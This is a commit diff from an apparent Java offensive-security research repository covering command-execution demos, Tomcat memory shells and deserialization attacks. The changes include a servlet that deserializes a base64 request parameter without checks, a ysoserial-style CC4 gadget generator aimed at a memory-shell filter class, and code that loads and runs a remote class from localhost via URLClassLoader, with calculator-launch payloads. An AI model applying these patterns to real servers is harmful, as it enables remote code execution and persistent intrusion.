sync :)

Whoopsunix · Whoopsunix · commit 1049ec651dc7 · 2023-10-09T10:42:47.000+08:00
diff --git a/Command/src/main/java/org/command/exec/ScriptEngineDemo.java b/Command/src/main/java/org/command/exec/ScriptEngineDemo.java
@@ -9,7 +9,7 @@
 /**
  * @author Whoopsunix
  */
-public class ScriptEngineManagerDemo {
+public class ScriptEngineDemo {
     public static InputStream exec(String cmd) throws Exception {
         InputStream inputStream = null;
 
diff --git a/MemShell/TomcatMemShell/src/main/java/com/demo/servlet/Base64DeSerializerServlet.java b/MemShell/TomcatMemShell/src/main/java/com/demo/servlet/Base64DeSerializerServlet.java
@@ -19,6 +19,7 @@ protected void doPost(HttpServletRequest req, HttpServletResponse resp) {
         try {
             // 反序列化
             String base64Str = req.getParameter("base64Str");
+            System.out.println(base64Str);
             byte[] bytes = Base64.getDecoder().decode(base64Str);
             ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
             ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
diff --git a/MemShell/TomcatMemShell/src/main/java/com/demo/utils/Ser.java b/MemShell/TomcatMemShell/src/main/java/com/demo/utils/Ser.java
@@ -9,6 +9,6 @@
 public class Ser {
     public static void main(String[] args) throws Exception{
         CC4Generator cc4Generator = new CC4Generator();
-        cc4Generator.make(TomcatFilterJMXMS.class);
+        cc4Generator.make(TomcatFilterContextClassMS.class);
     }
 }
diff --git a/README.md b/README.md
@@ -10,6 +10,8 @@ By. Whoopsunix
 
 🚧 长期项目 不定期学习后更新......
 
+部分 RceDemo 已经集成在二开 [ysoserial](https://github.com/Whoopsunix/ysoserial) 项目中
+
 ## 目录
 
 - [0x01 RceEcho](#0x05-rceecho)
@@ -121,7 +123,7 @@ Version Test
 - [x] ProcessImpl & UnixProcess
 - [x] ProcessImpl & UnixProcess by unsafe + Native
 - [x] Thread
-- [x] ScriptEngineManager
+- [x] ScriptEngine
 - [x] jni
 
 ## [执行结果输出（InputStream 处理Demo）](Command)
diff --git a/Serialization/AttackJar/src/main/java/org/example/ExecArg.java b/Serialization/AttackJar/src/main/java/org/example/ExecArg.java
@@ -7,13 +7,23 @@ public class ExecArg {
     public ExecArg() {
     }
 
-    public ExecArg(String cmd) {
+    private ExecArg(String cmd) {
         try {
             Runtime.getRuntime().exec(cmd);
         } catch (Exception e) {
         }
     }
 
+    public ExecArg(Integer num) {
+        try {
+            if (num == 123) {
+                Runtime.getRuntime().exec("open -a Calculator.app");
+            }
+
+        } catch (Exception e) {
+        }
+    }
+
     public void exec(String cmd) {
         try {
             Runtime.getRuntime().exec(cmd);
diff --git a/Serialization/AttackJar/src/main/java/org/example/Run.java b/Serialization/AttackJar/src/main/java/org/example/Run.java
@@ -1,37 +1,48 @@
 package org.example;
 
+import java.lang.reflect.Constructor;
 import java.net.URL;
 import java.net.URLClassLoader;
 
 /**
  * @author Whoopsunix
  */
 public class Run {
-    public static void main(String[] args) throws Exception{
+    public static void main(String[] args) throws Exception {
         /**
          * 调用 static
          */
-//        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
+//        URL url = new URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
 //        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
 //        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
 //        Object object = loadedClass.newInstance();
 
+        URL url = new URL("http://127.0.0.1:1234/");
+        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+        Class<?> loadedClass = classLoader.loadClass("org.example.Exec");
+        Object object = loadedClass.getConstructor(null).newInstance(null);
+
         /**
          * 调用构造方法
          */
-//        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
+//        URL url = new URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
 //        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
 //        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
-//        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
+//        // public
+////        Object object = loadedClass.getConstructor(String.class).newInstance("open -a Calculator.app");
+//        // private
+//        Constructor constructor = loadedClass.getDeclaredConstructor(String.class);
+//        constructor.setAccessible(true);
+//        Object object = constructor.newInstance("open -a Calculator.app");
 
         /**
          * 调用方法
          */
-        URL url = new URL("http:///127.0.0.1:1234/AttackJar-1.0.jar");
-        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
-        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
-        Object object = loadedClass.newInstance();
-        loadedClass.getMethod("exec", String.class).invoke(object, "open -a Calculator.app");
+//        URL url = new URL("http://127.0.0.1:1234/AttackJar-1.0.jar");
+//        URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+//        Class<?> loadedClass = classLoader.loadClass("org.example.ExecArg");
+//        Object object = loadedClass.newInstance();
+//        loadedClass.getMethod("exec", String.class).invoke(object, "open -a Calculator.app");
 
     }
 }

Original file line number	Diff line number	Diff line change
`@@ -9,6 +9,6 @@`
`9`	`9`	`public class Ser {`
`10`	`10`	`public static void main(String[] args) throws Exception{`
`11`	`11`	`CC4Generator cc4Generator = new CC4Generator();`
`12`		`- cc4Generator.make(TomcatFilterJMXMS.class);`
	`12`	`+ cc4Generator.make(TomcatFilterContextClassMS.class);`
`13`	`13`	`}`
`14`	`14`	`}`